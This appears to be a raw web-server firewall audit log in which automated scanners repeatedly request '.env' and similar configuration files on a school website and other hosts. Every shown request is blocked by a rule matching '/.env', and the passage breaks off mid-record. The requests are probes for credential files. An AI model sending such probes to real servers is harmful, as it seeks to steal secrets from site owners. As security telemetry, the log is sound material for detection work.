Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e913181a-Z-- --a6debd32-A-- [26/May/2025:17:15:54 +0700] aDQ_Wv7lSIOiZEhmvSx5bwAAAFA 103.236.140.4 55506 103.236.140.4 8181 --a6debd32-B-- GET /media/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-T113 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 --a6debd32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6debd32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254554833314 787 (- - -) Stopwatch2: 1748254554833314 787; combined=264, p1=231, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6debd32-Z-- --f0772635-A-- [26/May/2025:17:15:56 +0700] aDQ_XM-W3hHsdQpQwdTy0wAAANE 103.236.140.4 55560 103.236.140.4 8181 --f0772635-B-- GET /server/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Opera/9.62 (Windows NT 6.0; U; de) Presto/2.1.1 --f0772635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0772635-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254556409091 622 (- - -) Stopwatch2: 1748254556409091 622; combined=237, p1=212, p2=0, p3=0, p4=0, p5=25, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0772635-Z-- --31a7596e-A-- [26/May/2025:17:15:58 +0700] aDQ_XlSmKJQK-9oQ9SRLmAAAAJc 103.236.140.4 55632 103.236.140.4 8181 --31a7596e-B-- GET /media/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 --31a7596e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31a7596e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254558620771 814 (- - -) Stopwatch2: 1748254558620771 814; combined=307, p1=268, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31a7596e-Z-- --08333a68-A-- [26/May/2025:17:15:58 +0700] aDQ_XlSmKJQK-9oQ9SRLnAAAAI8 103.236.140.4 55642 103.236.140.4 8181 --08333a68-B-- GET /staging/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) --08333a68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08333a68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254558827679 824 (- - -) Stopwatch2: 1748254558827679 824; combined=313, p1=278, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08333a68-Z-- --67d4b149-A-- [26/May/2025:17:16:00 +0700] aDQ_YFSmKJQK-9oQ9SRLpQAAAIk 103.236.140.4 55692 103.236.140.4 8181 --67d4b149-B-- GET /server/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; CMDTDFJS) --67d4b149-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67d4b149-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254560155652 824 (- - -) Stopwatch2: 1748254560155652 824; combined=315, p1=278, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67d4b149-Z-- --4ed48a78-A-- [26/May/2025:17:16:01 +0700] aDQ_YVSmKJQK-9oQ9SRLrwAAAJE 103.236.140.4 55726 103.236.140.4 8181 --4ed48a78-B-- GET /twilio/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) fancybrowser Safari/538.1 --4ed48a78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ed48a78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254561141449 878 (- - -) Stopwatch2: 1748254561141449 878; combined=366, p1=331, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ed48a78-Z-- --13d41760-A-- [26/May/2025:17:16:01 +0700] aDQ_YXFOzWd_Ai7zJXWuLAAAAA0 103.236.140.4 55750 103.236.140.4 8181 --13d41760-B-- GET /staging/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --13d41760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13d41760-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254561866983 678 (- - -) Stopwatch2: 1748254561866983 678; combined=220, p1=193, p2=0, p3=0, p4=0, p5=27, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13d41760-Z-- --f64d4532-A-- [26/May/2025:17:16:02 +0700] aDQ_Yv7lSIOiZEhmvSx5jAAAAFc 103.236.140.4 55778 103.236.140.4 8181 --f64d4532-B-- GET /.env.save HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPod touch; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 --f64d4532-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f64d4532-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254562758600 962 (- - -) Stopwatch2: 1748254562758600 962; combined=343, p1=306, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f64d4532-Z-- --0d7a6422-A-- [26/May/2025:17:16:04 +0700] aDQ_ZM-W3hHsdQpQwdTzCAAAANA 103.236.140.4 55818 103.236.140.4 8181 --0d7a6422-B-- GET /twilio/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 --0d7a6422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d7a6422-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254564044265 839 (- - -) Stopwatch2: 1748254564044265 839; combined=320, p1=279, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d7a6422-Z-- --5bad7779-A-- [26/May/2025:17:16:07 +0700] aDQ_Z8-W3hHsdQpQwdTzOQAAAMc 103.236.140.4 55942 103.236.140.4 8181 --5bad7779-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Links (2.1pre15; Linux 2.4.26 i686; 158x61) --5bad7779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bad7779-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254567834133 818 (- - -) Stopwatch2: 1748254567834133 818; combined=322, p1=288, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bad7779-Z-- --dd2b2707-A-- [26/May/2025:17:16:11 +0700] aDQ_a8-W3hHsdQpQwdTzTQAAAMM 103.236.140.4 56066 103.236.140.4 8181 --dd2b2707-B-- GET /config/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G531F Build/LMY48B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Mobile Safari/537.36 --dd2b2707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd2b2707-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254571636003 718 (- - -) Stopwatch2: 1748254571636003 718; combined=274, p1=242, p2=0, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd2b2707-Z-- --2f7ffb03-A-- [26/May/2025:17:16:12 +0700] aDQ_bFSmKJQK-9oQ9SRL2AAAAJc 103.236.140.4 56108 103.236.140.4 8181 --2f7ffb03-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 --2f7ffb03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f7ffb03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254572895814 819 (- - -) Stopwatch2: 1748254572895814 819; combined=312, p1=273, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f7ffb03-Z-- --ab9b606b-A-- [26/May/2025:17:16:14 +0700] aDQ_bs-W3hHsdQpQwdTzcQAAANc 103.236.140.4 56162 103.236.140.4 8181 --ab9b606b-B-- GET /stage/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0.1pre --ab9b606b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab9b606b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254574382747 635 (- - -) Stopwatch2: 1748254574382747 635; combined=233, p1=208, p2=0, p3=0, p4=0, p5=24, sr=57, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab9b606b-Z-- --d612c902-A-- [26/May/2025:17:16:18 +0700] aDQ_cv7lSIOiZEhmvSx5sgAAAE4 103.236.140.4 56310 103.236.140.4 8181 --d612c902-B-- GET /stage/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.218 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.78 Safari/537.36 OPR/32.0.1953.96473 --d612c902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d612c902-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748254578965141 1088 (- - -) Stopwatch2: 1748254578965141 1088; combined=380, p1=340, p2=0, p3=0, p4=0, p5=39, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d612c902-Z-- --83e37440-A-- [26/May/2025:18:23:41 +0700] aDRPPVSmKJQK-9oQ9SSFnAAAAIY 103.236.140.4 34448 103.236.140.4 8181 --83e37440-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15 Accept-Charset: utf-8 --83e37440-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83e37440-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748258621658264 679 (- - -) Stopwatch2: 1748258621658264 679; combined=270, p1=238, p2=0, p3=0, p4=0, p5=32, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83e37440-Z-- --4f3d735c-A-- [26/May/2025:18:26:00 +0700] aDRPyP7lSIOiZEhmvSyytQAAAE4 103.236.140.4 37848 103.236.140.4 8181 --4f3d735c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) konqueror/4.14.10 Safari/537.21 Accept-Charset: utf-8 --4f3d735c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f3d735c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748258760637208 611 (- - -) Stopwatch2: 1748258760637208 611; combined=264, p1=236, p2=0, p3=0, p4=0, p5=27, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f3d735c-Z-- --beaf6f13-A-- [26/May/2025:20:00:03 +0700] aDRl0_7lSIOiZEhmvSz40QAAAEg 103.236.140.4 55570 103.236.140.4 8181 --beaf6f13-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --beaf6f13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --beaf6f13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748264403754822 818 (- - -) Stopwatch2: 1748264403754822 818; combined=360, p1=292, p2=0, p3=0, p4=0, p5=68, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --beaf6f13-Z-- --89d8326b-A-- [26/May/2025:20:25:31 +0700] aDRry_7lSIOiZEhmvSwLZgAAAFM 103.236.140.4 41400 103.236.140.4 8181 --89d8326b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 Accept-Charset: utf-8 --89d8326b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89d8326b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748265931350335 766 (- - -) Stopwatch2: 1748265931350335 766; combined=297, p1=264, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89d8326b-Z-- --0166ac15-A-- [26/May/2025:20:25:34 +0700] aDRrznFOzWd_Ai7zJXU1YAAAABY 103.236.140.4 41484 103.236.140.4 8181 --0166ac15-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 Accept-Charset: utf-8 --0166ac15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0166ac15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748265934343486 703 (- - -) Stopwatch2: 1748265934343486 703; combined=308, p1=275, p2=0, p3=0, p4=0, p5=33, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0166ac15-Z-- --e516427c-A-- [26/May/2025:21:01:16 +0700] aDR0LFSmKJQK-9oQ9SQMYwAAAIk 103.236.140.4 44732 103.236.140.4 8181 --e516427c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.225.75.246 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.225.75.246 